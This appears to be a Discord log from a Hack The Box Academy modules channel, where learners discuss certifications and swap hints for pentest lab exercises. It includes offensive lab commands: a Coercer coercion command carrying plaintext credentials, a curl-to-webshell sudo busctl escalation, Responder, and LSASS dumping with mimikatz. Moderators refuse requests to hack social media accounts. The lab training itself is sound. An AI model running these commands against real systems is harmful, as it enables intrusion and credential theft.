#modules

I havent gotten any htb certs, but I have the OSEP CRTO and OSCP

kinda broke right now, but I plan on getting certified through htb once I get some extra money

OSCP is kinda what i was thinking..but for that cost, i want to be sure lol

When I was applying for jobs, alot of the HR people asked me about it

I think HTB content is more thorough

but the OSCP is recognized as kind of a gate-keeping cert

yea thats kinda why i thought at least getting the OSCP may help, though i'd value the CPTS more i think

well like you, kinda broke so reluctant to spend too much money needlessly lol

I think both learning platforms have their benefits

honestly, I think HTB academy content is more thorough, but I do love being able to watch the videos of Offsec courses

yea most certs ive done over the last few years have been mostly through vids

so this has been a change for me

last year i got my JNCIA and Security+. very heavy on the vids/multi choice exams lol

nice!

oh yea? because theyre multi choice?

I had the Pentest+ and literally 0 people hiring asked me about it lol

I did a linkedin search and it had 0 job listings

theyre another gateway cert. i didnt mind them tbh

they're not bad at all

I just had a bad experience with pentest+ lol

and employers asking me what that was haha

hahaha. funny you mention it. my original plan was to do pentest+ endof this year as prep for more hands on. but then i saw a review on youtube for HTB and checked it out.

yeah I mean comptia is reputable

but pentest+ is a new cert and doesn't have much clout

hahaha well i see that one as more useful for some less-technical managers who need to know how it works but not being able to do a pentest

I think the CPTS is gaining traction

yea i think so. i mentioned it to a few others looking to get into the industry and they ahd heard about it recently too

i actually recommended to someone the other day to join up, do the skill paths like InfoSec fundamentals, Linux basics, then go to CyberDefenders and do there content and/or the CDSA

nice

honestly I think comptia is well known.. I've heard of Sec+ being required for jobs with the DoD

I just had a bad experience with Pentest+ lol

yea it is for a lot

i liked Sec+. i almost did Net+ but decided with JNCIA isntead

i highly recommend JNCIA. it can be a little vendor specific to juniper but there content in general is more on the vendor-neutral side.

JNCIA sounds cool

I havent ever heard of it

have you heard of CCNA?

its Juniper's equivalent to that

and juniper is all unix based which attracted me too lol

Could anyone help me with ntlm attack module?

I have some friends with the CCNA

they do like networking specific tasks

we might want to carry on this chat in private msgs

I dont want to flood the modules channel

yea, which is what its for. having some networking knowledge helps me in some of my jobs. i wanted to codify it in a cert and chose the JNCIA. glad i did tbh

need some help with: Use Coercer in 'coerce' mode against 172.16.117.60 and submit the name of the first RPC call resulting in the message '[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass'.

In Shells & Payloads > Automating Payloads & Delivery with Metasploit. Is ||meterpreter|| not the command line interpreter used to establish a system shell session with the target as the first challenge question asks? Why is ||powershell|| the accepted answer there?

hey can anyone sanity check me on the skills assessment for advanced sql injection? I've dumped the db but am creating the wrong Reset key for some reason

small question about attacking common application skill assessment 2, i managed to get a reverse shell, but cant find the flag, tried to escalate to root, but the method is not working, any help? 😅

nvm it was a typo

ok nvm the nvm, i cant find the flag 🙂 💔

hello guys im stuck here

Next, we can set the wley user as our starting node, select the Node Info tab and scroll down to Outbound Control Rights.

im searching outbound control rights but i dont see

select them, click them and see

either that your your collector didn't get everything properly

oh okey

outbound object control

Hey guys can someone provide guidance for the last question of the Active Directory Trust Attacks - Skills Assessment? i rally have no idea where to go
i have an evil-winrm console on dc04.mssp.ad as Adminstrator but i can't really query the fabricorp.ad domain and i can't seem to fin any creds to move to fabricorp.ad
Ty

have you checked what other creds you can get from it?

got one other has of the user h***y

hash*

yep, look for edges from that

ty

Hello everyone , i have a question
module : Kerberos Attacks
section : skill assessment
the last question , i am not able to connect to the DC using RDP to use tools like rubues , is there any other method ?

evil-winrm

AD enum attack module
ACL Section
ACL enum page
last question

What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)

2 I can see about me but it doesn't accept it

Perform the search shown in the module, note you can use the Identity "GPO Management"

Bloodhound might not show the term that's expected

could anyone help me with ntlm relay attack coercer tool part: Use Coercer in 'coerce' mode against 172.16.117.60 and submit the name of the first RPC call resulting in the message '[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass

hm i use hte powershell?

Yes

Use the tools and techniques shown in the section

Anyone got any tips on how to get the machine on 'Internal Password Spraying - from Windows' to work?

xfreerdp is just returning a black screen, rdesktop saying invalid creds. I did manage to get it to connect once using xfree but I made it fullscreen and the session bugged out and dropped
Tried with kali and pwnbox same issue on both.

okey thank you

Press enter when black screen shows up

This is the 100th time someone's had that issue lmao

Thanks again , I checked discord history first and saw multiple people reported having this issue. Had tried using esc as someone had mentioned in a reply and it didnt work but enter worked once I was able to get it to connect.

20 mins to find out you need to press enter on the black screen then 20 seconds to get the answer to the question.

marcielee could I dm you about one module question?

can i send u a private message ?

No

hey can anyone explain to me unmanaged powershell? I am having areal tough time detecting it and would love some help.
in the analyzing evil module

just ask here

Can someone give me some hint on this question " What is the API key the inlanefreight.htb developers will be changing too?" INFORMATION GATHERING - WEB EDITION module. I've been using ffuf for the past 2 days and cant find any subdomains. Added IP into /etc/hosts. Using Seclists wordlist. What am I doing wrong?

ffuf -w /home/htb-ac-927183/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.www.inlanefreight.com" -u http://94.237.59.63

Where is the port

I tried with the port too but it didnt work

the port is needed

what do you need help with

ok knowing that the port is needed is a great help, saves me a tone of time. Am I using the right host? I've tried with the inlanefreight.htb but didnt find anything

i got annett.xxx credentials , and i have connected to x.x.x.35 using rdp , and i got the ticket of the service and make renew and pass the ticket , but i am not able to read the \\DC01\Secret Share\flag.txt

are you using the right ticket? did you try to coerce?

anyone having difficulties rdp to targets?

@next bronze I am trying to use coercer with responder but I only recieve "no_auth_recieved" in the output of coercer

thank you !

did you check the klist output ?

i got it , thanks alot

ive tried everything what happend over the last few days

just stopped working

probably because your responder isn't running

gg

use /p:'pass'

maybe the xfreerdp cannot read the password correctly

didnt work

try /tls-seclevel:0

wherwe would i put that?

v: /u: /p:

/tls-sec

in the command xfreerdp /u: /p: /v: /tls-seclevel:0

sstill no workie

? huh i wonder whwats going on with this

out of ideas , maybe re-spawn the target or contact the support

use rdesktop or remmina

may I ask you why the xfreerdp didn't work ?

I prefer to use it over the other tools

¯_(ツ)_/¯

@next bronze In the module I think they didn't mention any special responder configuration

I mean did you try putting the first name form \PIPE\lsass ?

Hi guys, any one knows what going on on The Live Engagement challange on SHELLS & PAYLOADS module ? the host-2 flag ? how can i upload a module on msfconsole

@next bronze in coercer command?

still having difficulties after git cloning the rdesktop doesnt find it

Is it meant to be.com?

I swear this assessment is.htb

Can’t discover any subdomain. This gotta be broken.

Or you're looking in the wrong place? What section are you doing

If it's the assessment; the domain is inlanefreight.htb

--help

You don't have to

Just use xxxx.rb

And it'll load

exactly, and make sure you set the correct info and run

Iirc if you forget to add a vhost it doesn't work

thanks, but is this obvious ?

Did you set all options correctly?

how do i install remmina and use it its not im not really getting it?

Pwnbox and parrot should have it installed by default

Otherwise it's likely in the repos with a sudo apt install

yeah all

whats the syntax structure to use it

Exit then reopen msfconsole and do it again

It's a gui tool

So just type remmina and it should just pop up the gui

Heyy, while doing the module Network Enumeration with nmap in the section of nmap scripts, I see that the machine has a ||DOS vulnerability on the smb||, could I try to exploit that, or would that be too intrusive?

No need for that

Ok gotcha, ty very much

hey marcie its failing

im in remmina tho

made a new profile

but no workie

reach out to support then ¯_(ツ)_/¯

Try --script vuln, also note which services are running

Or maybe discovery

made that, i changed the payload too to reverse and still have the same issue

Okok, I already tried it but it didn't seem to give me much besides the thing I mentioned

You don't need to change the payload

Are you using the right IP

Note which interface can connect to the target server

make sure to add vhost if exist

btw, I already found a flag, but I think it was the same as the one from the previous exercise, that's why I "ignored it"

HTB{8..6} is the flag, but it has nothing to do with DOS

Note what ports are open

Okok I will, ty very much for the help

need help. having some problem completing the windows attack and defense > credentials in share. for some reason i can't see the server01 and even the DC can't ping it

WINDOWS PRIVILEGE ESCALATION

Windows Server

this chapter and module

i also dont have the help button on the bottom of the screen

yes the answer is in the output

need help. having some problem completing the windows attack and defense > credentials in share. for some reason i can't see the server01 and even the DC can't ping it. resending with attach SS

@next bronze thx I will try to specified the rpc call

Disable adblock

in my browser

just run the tool normally and look at the output

No, in your mind

i am stuck on pdf generator exploitation of injection attacks module. can someone who have done the section DM me to help please. Thnx

🫤

Ask dumb questions, get dumb answers

@next bronze you meab during the scan method or coerce method?

bud just run it and look at the RCP call names, use those as the answer

it's right there in the output

I have problems with the coerce part not the scan..not getting anyone coerced...

screenshot the output

I see the answer right there

you also didn't show the command you used

Not to spoil nothing...

To the rest of the community

there's nothing to spoil, the command to run it is already given in the module

either way the answer is in the screenshot

I am sure you are referring to the first question of the section... Not the second...And I have troubles with the second

I am referring to the second question

I am no getting any result with Error bad netpath

buddy, if you refuse to provide the command you used, or try the RPC call names in the screenshot, I can't help you

Recently completed the pivoting modules and there was not much content on double pivoting, basically only the RDP example. Now I am trying to do it with metasploit, trying to chain multiple reverse port forwards togheter back to attack box, but every time I add a new reverse port forward rule, the previous one gets deleted. Anyone else faced this ?

No, bc I use ligolo-ng

honestly I am thinking about giving up and learning about that one too, been trying for 2 hours to make this work with various workarounds

does it make it easy to set up double/triple pivots ?

Yes

You set your listener up to forward to your host

Repeat ad nauseum

You'll need to link up multiple ligoloX interfaces if you don't want to have to stop/start sessions

you might want to try with autoroute, i think i did used it for double pivoting

it does not seem to help me past second pivot

this is the topology, the idea is to get a meterpreter session with PIVOTWIN10, the last host on the right, so far I only managed to get meterpreter sessions with Ubuntu and server01 hosts

I wouldn't pivot with metasploit tbh, has been pretty unreliable from my experience

some of my notes, i'll not spawn the target at the moment but it seems to me I had access to the 172.16.6.0 network

ssh/chisel would be ideal, even better is ligolo as mentioned

sure, it is just i tried the stuff when doing the module.
and for Xoriath, i checked and i got a evil-winrm session on the last host, i do not see a meterpreter session

yeah, it's possible to get an rdp on it too, my idea was to sort of use metasploit as a c2, but I guess that's not really a thing for this

Hmmm alright, ligolo it is then. Chisel I would not know how to set up double pivot with it. I assume it is in the exam right, are we supposed to figure it out on our own ?

chisel you can dynamic the first tunnel and standard port forwarding the second

but yes ligolo would make this a lot easier

yeah there is some articles about it, like this one https://www.hackingarticles.in/a-detailed-guide-on-ligolo-ng/

sorry if dumb question, is this how you would do it with chisel ?
Server on attack box, then chisel client on first pivot with socks option, then copy chisel binary to second pivot, start it as client there and start another chisel process as server on the first pivot ?

You'd set up a forward to route pivots back to your host

From host A you'd forward to attack box, then connect to B from A

And use the forwarded port

Ligolo is a lite c2 which allows remote management of the listeners (but not full command/control)

can anyone sanity check me for the advanced sql injection skills assessment? I dumped the db but for some reason the next step isnt working for me

Hey man did you work this out? Been having the same error. Tried restarting lab and increasing timeout but the SMB connection seems super slow.

Try changing vpn regions, respawning target

Will try, btw do you think it will make a difference if I try to mount it?

I don't think you can mount it

Considering it might be filesystem differences and such

Sorry I know I shouldn't talk about that here, but I got no choice. It's the only channel I can talk in so I think there is a problem

@next bronze Coercer coerce -t 172.16.117.60 -l 172.16.117.30 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local -v --always-continue and for responder sudo python3 Responder.py -I ens192

no one of the output has this result: '[+] (ERROR_BAD_NETPATH)'

all the rpc calls have this result: (NO_AUTH_RECEIVED)

-u 'plaintext$' -p 'o6@ekK5#rlw2rAe' is this a valid account? have you checked?

yes with crackmapexec

to smb service

even using smbclient.py I can loggin

so it's not a valid account

what you mean?

So You need to provide a valid username and password to authenticate to the host ?

did you try to add an account from the previous section instead of just copying the command given in the section

so it is necessary to make a post relay attack throught ldap, create the host account and use it for this?

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.

Regarding this question above, I have dumped the process using volatility, used YARA to scan for malwares, used the cmdline plugin where I got an encoded command. I tried decoding it but couldn't.
I manually scrutinized the memory dump, tried several other things but still no head way.
All I am asking for is a hint, that'll help me move in the right direction.

you have an actual account created previously don't you? why just blindly copy and paste the commands in the module?

because for different reason I cannot do in a single row all the sections so the answer is NOT, I try always to understand what I am doing but if there is nothing explained about what are the criterias for the credentials needed...sorry not to ask myself to do in anotehr way...

Yes

if the creds are not explicitly provided for you to use, or ones that you have created, you can assume they don't work

especially the accounts used in the sections, they're usually removed or disabled so that you have to follow what they did in the module instead of copy and pasting

yeah the question is to know if the error comes from the credentials or responder.conf file or whatever...is the first time I saw this tool so....

I am sure you have also copied and pasted in some moment mate!

"We can view the first archived version of HackTheBox by entering the page we are looking for into the Wayback Machine and selecting the earliest available capture date, being 2017-06-10 @ 04h23:01" -- am I the only one that can't see a snapshot for this date?

I actually don't

I have never used that plaintext$ account in the module because I assume it doesn't work

I don't mean in this module 🙄

I mean in your learning path

again I don't blindly copy commands without understanding what they do

Understanding what coercer is doing it is not relevant for asuming that the credentials provided in the example are not going to work! Maybe you asumed it, well done! But it doesn't mean that others are copying and pasting without thinking.

some call it blindly copying, I call it "dynamic analysis"

so which one are you

try to asume ! you are really good on it

buddy is mad at me for not being able to copy and paste commands in modules

Hackthebox.eu

@next bronze no way dude, you helped me!! 🙂

🤦‍♂️ Thank you
hackthebox.eu/en specifically. haha

wow finally, no dumb banner on the top of the htb pages.

Hello guys

Good morning!/Good Evening!

I am doing the Oracle TNS module, it's so time consuming!

still running the "odat.py" script

It can take a bit of time

But make sure you didn't miss the user/pass

Once you get that you can stop it

Hey guys
I’m going through the Attacking Enterprise Network, I complete External Testing, but I don’t understand why we choose ||monitoring|| subdomain for testing more deeply, could you explain please?

Since you've presumably done the course content up to this point you should know this

Also: most people do this blind, so revealing the subdomain is spoiling

If he knew he wouldn’t ask

Yes, it's still enumerating that

Short answer: you check all found subdomains

Yes, I found all vuln on this subdomains. Only ||monitoring|| subdomain in our scope?

No: it's just literally common to check all of what you can do

Also redact the subdomain, since spoiling

The other thing is a subdomain can reveal the type of content that may be found

In this module, are we just not following the steps for deeper testing with other subdomains?

i need help with this question can anyone heelp me

What exactly have you tried?

I managed to mount it and copied the file onto my local system. Took about 30-60 minutes.. :D

The module is to test everything you’ve learned so far

gobuster dns found a subdomain w......7
did a gobuster on that subdomain nothing shows
did a dir search found some dir but nothing of vaule
used

The module shows you other things. Brute force does not always work

dnsenum didn't work, final recon didn't work

Reconspider didnt work

Take a look at the module. There are other things you can try

amass nothing

Hello

Anyone?

Anyone know how to use medusa to hack social media?

are you sure your command has a correct syntax? did you try multiple options? Do you get errors? Do you understand what you are spidering?

@honest tinsel hello

Hi

Think of AEN as a mock Exam

Take any point you can to move forward

<@&861185840277487616> , I suggest you don't ask

I know I need to bypass strong security measures

Okhhay@fathom pendant

Rate limting etc

All you need to know is that it's illegal

that is not what HTB is for

Read #rules and #welcome to see what this server is about

if you're interested in that, I suggest you look elsewhere

Aware. But doing it to my own account

Doesn't matter

we don't teach or condone illegal activity

Trying to elavte to be an ethical hacker

You dont own your social media acc 😂

^

Also depending on the service they may have carveouts for you testing on your own account(s) but you do gotta read their bounty/vdp

Hello can we talk just casually 👀

This channel isn't for casual talk

#modules is for conversations related to Academy modules. There are more off-topic channels around, but in none of them do we accept users discussing illegal activity

(in a non-ironic manner)

sorry to be a killjoy

🙃

But idk why

I can't access general channel

please read #welcome , it will all make sense

i understand what its doing

ffuf also produces nothing

You have found a subdomain.
Apply all the techniques shown in the module to this subdomain. I think you will then find what you are looking for.

does the IPMI module's target machine takes a long time to be spawned?

I need to mount the VHD now that I've likely obtained the password. I thought of copy pasting to another VM which is Windows but it doesnt seem to work.

How would you approach this?

share the screenshot

Not much to share, I simply cannot copy/paste from one vm to another or to the host. Neither drag it

you can transfer the file over to a windows vm

A vm of my own right?

yes if you'd like to mount it in windows

But it seems that when I try to drag and drop or just ctrl c ctrl v the Backup.vhd file it wont

from where to where

From kali VM to windows VM

pretty sure inter vm copy and paste isn't possible for both vbox and vmware

you can use other methods to transfer files

Yeah.. Which one would you use?

mount a shared folder, http server, smb server, etc

I mean you can also copy the files to your host then to the windows vm

Yup tried that one but didn't seem to work.. But thanks I think I found a way :D

can anyone sanity check me?I'm trying to generate a secret key in the Advanced SQL Injection Skills Assessment and am not sure why it is saying my secret key is invalid

hmm.. i think I found my issue... fernflower and jdgui were decompiling the application differently

leading to completely different ways of generating secret keys

debugging it locally helped me see what was wrong

I wrote a script to dump the DB but one of the columns wont dump. if anyone could nudge i'd be forever in your debt 🙂

If it is specified to me that I should refrain from attacking the service or using exploits, does that mean I should stay away from nmap scripts too? -sV sC for example

I think it depends on the script

some nmap scripts do more than others

Aye, i figure just running version scan would be fine right?

version should be fine

all it does is look at the output from the connection

and compare it to known values

cool ty

ofcourse

im talking about in htb labs

you might want to get permission first on a real target 🙂

noted

NTLM Relay Attacks --> NTLMRelayx Use Cases. Question says "Use impacket's SOCKS server to hold RMONTY's relayed connections and abuse them to find an accessible shared folder on one of the relay targets; once connected to it, submit the contents of the file 'connections.txt'." RMONTY doesn't seem to have permission to access the share, but PETER does. Am I doing something wrong?

Some scripts don't do anything except just look at/crawl for common things

peter's is used for question 2

yeah i know

there should be a share where the other guy can access

i was able to get it using the interactive smb client

it's the same share, peter can just access it with smbexec, rmonty cannot

so i see now, i just didn't go far enough in the section

rmonty can access it via the interactive but not exec

yes

smbexec and smbclient

ya

thanks

sad for us that ms is going to kill ntlm

i have a feeling environments will still have it 10+ years from now lol

yeah for sure

it will be a while before orgs actually stop using it

Hi, I am attempting to get reverse shell from MSSQL utilzing xp_cmdshell, but when getting a file via HTTP server the request is never reached to the server; however, when running nc on kali, the request received !

I am using Ligolo, the MSSQL is in HOST02 and the flow is as this: HOST02 -> HOST01 -> Kali

Do you have a listener forwarding the request?

Yes

So you have a listener that would forward the http request to your kali machine?

And you're specifying the proper port

Yes

woo hoo figured it out 😄

iirc i could only get access with smbclient too

hows the module going?

its great! im learning a ton

was kinda stuck for a while because jdgui decompiled the code incorrectly

but after decompiling it with fernflower im making good progress 🙂

noice!

also debugging java webapps with vscoded is neat

I don't do much whitebox stuff

do you have java coding experience already?

so this is a neat experience

only doing code review for vulnerable functions/obvious vulnerabilities

i actually have the Whitebox pentest module on favourites as well lol.

yeah that module was great too! 🙂

ah ok. i was just curious how much coding exp you need to do that kind of debug/review.

honestly I dont think you need much

i was leaning that way but wasnt entirely sure.

chat gpt will explain the code line by line

if you ask it to lol

oh, i havent thought of using chatgpt for that. interesting

hello guys, how are you? I am having problems with the Perfection machine... it does not respond to the execution of commands, can someone guide me a little?

thats how I've been learning to code well 🙂

err not well, but better

I read the code, and then when I get stumped I asked chat gpt what does this mean?

and then after just going through a bunch of code it becomes 2nd nature

i know of some ppl who used chatgpt to help with a scaffhold script for some python stuff. they said it wasn't 100%, but was a good base to then modify.

great to know! fountain of knowledge mate lol

yeah chat gpt is a definetely a tool. I'd check over its accuracy like I would a child

but its great for gaining some insight

I think the whitebox module talks about using it

to review the code

#boxes

That's a starting point machine yeah? #starting-point (read and follow #welcome )

perfection is a retired machine

tbh, i'm not a fan of ppl relying too heavily on genAI tools. i dont think its substitutes for foundational knowledge. but as an aid i'm all for it.

Ah

Still applies to read and follow #welcome to access it

I use chat gpt+ ghidra output to learn reverse engineering... it has been priceless

It all depends on how you use it

agreed!

too often i've had ppl just say 'can't we just get some AI/ML to do that' without understanding that good quality data is everything...models drift. and it doesn't substitute for having tranined personnel.

but i may use it for some hints/push like LonelyOrphan has used it. will definitely be helpful there

yea and I heard it gets worse if you have 1 model interacting with another. i've also had to shutdown that before.

on another note, this AD attack module has been super interesting!

interesting

would explain why our AI expert has a masters in applied mathematics. haha

which is definitely not my strong suit 😆

I really like the ADCS and ntlmrelaying modules, even though microsoft recently announced they were deprecating ntlm

ah, that makes sense though. as i've been going through, it just seems like its so susceptible to abuse

though HTB is obviously showing easier targets to reinforce training/learning.

yea definitely. all of the corp environments ive been in obviously use AD. im taking my time with this module. want to make sure i understand it.

30000 dimension matrices

(on the light end)

Can someone give hint on this question please? "What is the API key the inlanefreight.htb developers will be changing too?" It's a skills assessment on Information Gathering - Web Edition, last question. I found 2 additional subdomains and added them into /ec/hosts. Ran ./finalrecon.py --full --url http://inlanefreight.htb and cant find any API.

well out of my league haha

you need to go deeper

look for subdomains (and perhaps another)

I’ve tried running finalrecon on both subdomains that I found (we**** and de***) and nothing…Show me the way 😦

Does anybody know anyone that could help me get the email and password for a Instagram account or outlook for Free

did you try the spider? (the one provided by the module)

no read #rules

reconspider yes. I couldnt make that one work for some reason but I am gonna try harder now when you pointed out. Thanks

did you sudo pip install scrapy ? that's the only python submodule i needed to install to get it working

it also helps to have the subdomains in your /etc/hosts file

yeah but that pwnbox on HTB is so bugged, nothing works. Gonna try on my kali now

worked fine for me ¯_(ツ)_/¯

also to answer your question from earlier: the port does not go in /etc/hosts

you need to specify it in your command http://url:port

http defaults to 80, which this server isn't running it on

add --break-system-packages as said in the error

also i did not invite you to DM me

Intermediate Network Traffic Analysis, Peculiar DNS traffic. This module states the first step after a DNS query initiation is a local cache check. That is incorrect for a Windows machine, it should be that the Windows machine first checks to see if the hostname is its own, and then it checks the hosts file, and then the local cache. Am I wrong?

the microsoft documentation conflicts with what the module says

i believe for linux the order is determined by nsswitch.conf, but generally it checks the hosts file first then the local cache would would make it incorrect for linux as well

Oh sorry I don’t use Discord much, had no idea it was illegal to dm you. My bad

just ask first and I believe I told you no earlier

I don’t think you told me no since I never asked but ok will ask next time

it's in the server rules

Must have missed that rule…

Like I am missing API for this assessment lol

too late now, the police are on their way

as said reconspider should work, you just need to remember to specify the port

it's likely why finalspider wasn't working, you didn't specify the port for it to connect to, since 80 isn't the one hosting the service

Got it! Thank you so much! ❤️

anyone having issues with targets spawning?

hey guys! I'm having a bit of trouble with the last flag for the advanced sqli injection skills assessment. I've tried both ways of RCE mentioned in the module, along with a modified automated script. If anyone could sanity check me i'd be very grateful 🙂

Thank you!! I just spent 1.5 hours to fix this problem……

no

Yes, check this webpage 'https://github.com/simran-sankhala/Pentest-Tomcat' , paragraph "manual method"

Hi amigos. Hope you all having an excellent weekend. I have a question regarding enrolled paths. I am currently enrolled in the Bug Bounty Hunter path and have finalized 70% of the modules. But I have see then new path Senior Web Penetration tester and i feel this one will teach better skills that the Bug Bounty Hunter path. Do you think it is wise to just jump to a new path and continue from there? This will also help me as the Senior Web Pen path is much more expensive thus i could use the cubes I have to do this one. Any input is welcome. thank you all

I feel like if you’ve already done 70% you might as well finish the path. The remaining cubes you need for the last 30% are probably less than the cost of a single module of the cwee path.

Now if you already know everything you’d be learning in the last 30% you could save the cubes and start going for the advanced cwee modules, but as you already noticed they are much more expensive and if you are a platinum sub you can only do 2 per month

did anyone complete attacking common services module

none of the lab is working for me

cant find any open ports

even with -Pn and -p-

yes this is the case. You are correct. it is around 320 cubes to finish the whole bug bounty path. Why not finish it and then move one. This will open only 2 senior web pen modules. Do you know why we have 15 modules in Senior Web pen tester each at 100 cubes but the course is estimated at 7500 cubes?

the maths dont really add up or I am missing some info?

which one? easy/medium/hard?

i agree with the othesr. you may as well finish the CBBH path. unless you're already a very experienced web pentester, it'd be best to start with CBBH and then move on

actually i mean the in section exercises

none of them working

Did you connect vpn?

ah ok. unsure. i couldnt spawn a target for hours.

target is spawning

but no services responding

when thats happened to me, ive had to reset the target

i know one of them was broken as i went online to find some walkthroughs and the particular port was closed for me, but was most definitely meant to be open

i have respawned the target many times

but same problem

well it could be buggy like the 1 i had

otherwise im unsure. you may have to look for some help. i used youtube a few times to give me a nudge or google couldnt help

its 15 modules at 500 cubes each, but you get 100 cubes back for each you finish

you know any source where i can get walk through for this module?

the course is the best walkthrough. If the lab is really not working it is likely a support issue. Which section are you on? If you want I can try to spin up the lab and see if it works from here

after spawning the target many many times,i got one which is working

but it only works on attackbox

not vpn

did you try to redownload a vpn configuration file, maybe checking for another region with less load, switching to tcp?

I will try

also many basic tools like crackmapexec isnt on attackbox

and when installing them with apt it shows error

i do not use attackbox, it should be there tho. you can try to install netexec since crackmapexec is no longer maintained
https://github.com/Pennyw0rth/NetExec

ok

i just checked and netexec is already on the pwnbox

installing it now.

will have a look later

hello, i m doing the CBBH, more precisely, i'm doing the Information Gathering room and i'm at the Web Archives, but i can't answer to the first two questions, if someone can help me please

cant help you. just had a look and the questions are different

"How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234. "
"How many members did HackTheBox have on the 10th June 2017? Answer with an integer, eg 1234. "

You don't have this questions ?

i do. but i did that section before the update, and my answers dont watch the question

okay so how can i answer ?

not sure sorry. im not able to go back over the section and re-do it, right now.

The module shows you how you can view websites from the past Use this knowledge to access the information

yeah it s what i did i was able to answer to the following questions, but not the first two

Have a look at the website of the date mentioned and search for the information there.

yeah it s what i did too but it isn't working for hackthebox.com website

but for facebook.com, paypal.com... it worked

you may want to check closer the screenshot in the section

can you try it yourself because i can t

i got a redirection every time i try

okay i think i got it

yeah maybe just delete this post, so the fun isnt spoiled for other searchers : )

okay sorry but thank you very much !

Hi, currently doing the metasploit module and I'm on the payloads section. Basically, I got an Apache Druid service running, and I selected the exploit with the correct payload, but no matter what port I choose, or even what payload I choose, I always get an "Exploit completed, but no session was created." error. I had this before, and usually all I had to do was just switch payloads, but I went through every single one and get the same error. Whats the reason for this?

My LHOST is set to tun0

Alright solved, just NEVER use meterpreter payloads apparently, just use regular shells

did you set teh LHOST to your tun0?

that looks like it's your normal VBox IP

not the IP assigned by htb (which is a 10.10.0.0/16 address

(there's routing that restricts access and such

and if that can help,i got this from metasploit github issues:
You can set verbose true to see verbose output, then use the check method to check if the remote host is vulnerable.

You can set HttpTrace true and re-run the module to see the raw HTTP requests and associated responses. This may help you diagnose your issue.

tbh; it just looks like they used the wrong IP as their LHOST

also the exploit completed which means it worked, however no session was created because the remote host couldn't call back to their box

yes i did as i mentioned, because i know thats a common mistake, but once i switched to a regular shell payload everything worked fine

ya thanks, ill use that for trouble shooting in the future, from my research its because meterpreter payloads are unreliable these days

Hello, has anyone finished the crackmapexec skill assessment first question? I have followed the hint, but still, I am not able to enumerate the users. I have also seen the HTB forums, and I am not able to make --rid-brute

your LHOST IP in the screenshot doesn't look like the tun0 IP is why I asked lol; 10.0.2.15 isn't an HTB tun IP afaik

Take another close look at the option in the module. The module mentions one thing in passing, but it is important here

not getting reverse shell
what might be the reason

Windows Priv Esc Module ; DNSAdmins section

Do the most basic thing

How could you make the user's priv to update

I had to use sc.exe and not just sc to restart the dns

GOT iT

Needed some help in Blurry machine, is evaluate_models.py supposed to be writable? Its giving operation not permitted

yeah when using powershell you need to add the .exe extension

wrong channel read and follow #welcome and ask in #boxes

Module Linux Privilege Escalation - flag 5 -
I have managed to launch a webshell (https://github.com/simran-sankhala/Pentest-Tomcat/blob/main/README.md) to get flag4. Thanks to https://gtfobins.github.io/gtfobins/busctl/ and the fact that busctl has sudo rights, I should be able to escalate my privileges from Tomcat to Root. The thing is that the webshell does not respond to the command given (curl -u xxx : xxx http://localhost:8080/webshell/ -X POST -d 'cmd=sudo /usr/bin/busctl --show-machine \n !/bin/sh' ). Can anybody help ?

hi. If i take a memory dump of the lsass process (via the task manager for example) I can then use mimikatz to dump the hashes from the memory dump?

or i can use mimikatz to dump the hashes directly from the lsass process in memory. Correct?

mimikatz just dumps it depending on what submodule you use

ok. but it can dump from a saved file?

the idea of dumping the process and analyzing it on your system is to basically take the process off the machine

just need to call the right module

not sure, you can google though

ah yes makes sense. so would be to use pypykatz on my machine for example

Hi Everyone - can anyone assist with this really basic query?

Windows Fundamentals - Introduction to Windows

I've RDP'd in using xfreerdp

However I am unable to get any details using the "Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber" command as stated on the page.

I keep getting an error message "Get-WmiObject" is not recognized as an internal or external command, operable program or batch file.

I've tried this using xfreerdp on PwnBox and also using Remmina via OpenVPN but cannot seem to get it to work.

Any assistance would be greatly appreciated.

Have a great day

yeah the mimikatz submodule for it doesn't require you to have a file, because it grabs it from the machine itself

are u using a powershell?

you need to use powershell

Get-WMIObject is a powershell command

https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz @zealous rune to answer your question

cheers thx a lot

that's a gr8 site

in the module password attacks/attacking lsass, all the procedure is explained. It shows you can dump lsass via task manager then using pypykatz on linux to extract the creds

he was asking about using mimikatz on the windows machine

@wraith pelican indeed I understand that thx. I wanted to know if mimkatz on windows could be used to dump hashes from a previously dumped file

which isn't covered

perfect seems u can

I don't need it to complete the exercises i was just curious

my bad, i'm sorry

in future @zealous rune just utilize google

i'm not quite sure where you are or what you are doing. is it the skill assessment?

yes, flag5

ok i didn't do it this way. I got one way via ssh only, and one way via a webshell from wordpress but then it falls back to a user and ssh. Curious to see if this will work, keep me posted. And another thing, maybe check if another busctl gtfobin will work.

Can you tell a bit more about your way ?

probably best for dms since can be spoiler

just escalating from a user to another using the first ssh session as htb-student

Do you mean that you have found Tomcat's password ?

yes i got it

So you have flag4 + a password to switch user from barry to tomcat

Guys i'm having an issue with running Reconspider.py from the information gathering - creepy crawlies module, has this issue occured to any of y'all? i've followed the steps in the module carefully but this error keeps appearing

but yeah we might as well continue in DM and remove all those messages

what does DM mean ? But yes, how do I contact you ?

i sent you a direct message

pip install scrapy

i've also tried it on the htb pwnbox but i couldn't do it either

add --break-system-packages as stated by the note

find / -name "EXTERNALLY-MANAGED" it's one of those files added by python install

That worked! it's just the reconspider.py that gives the same error message

Whatsup peoples 👋

try with sudo

Maybe try everything from scratch again?

there's also the "To install Python packages system-wide try 'pacman -S python-xyz', where xyz is the package you are trying to install"

i mean install scrapy with sudo

you goober

or install the package with pacman, as also stated by the message

reading is literally half the battle here

Wondering, would this be the correct channel to post in if you would like a hint regarding a module

Seems like it, but just wanted to be sure

yes

Thanks, i have been trying to get through the cpts job role path by myself as much as possible but I have been stuck on 2 modules for a couple days.. currently stuck on subdomain bruteforce

2 tips on getting the best help:
Include the module you're on, and the section
include what you've tried

Most people are getting through the CPTS path by themselves

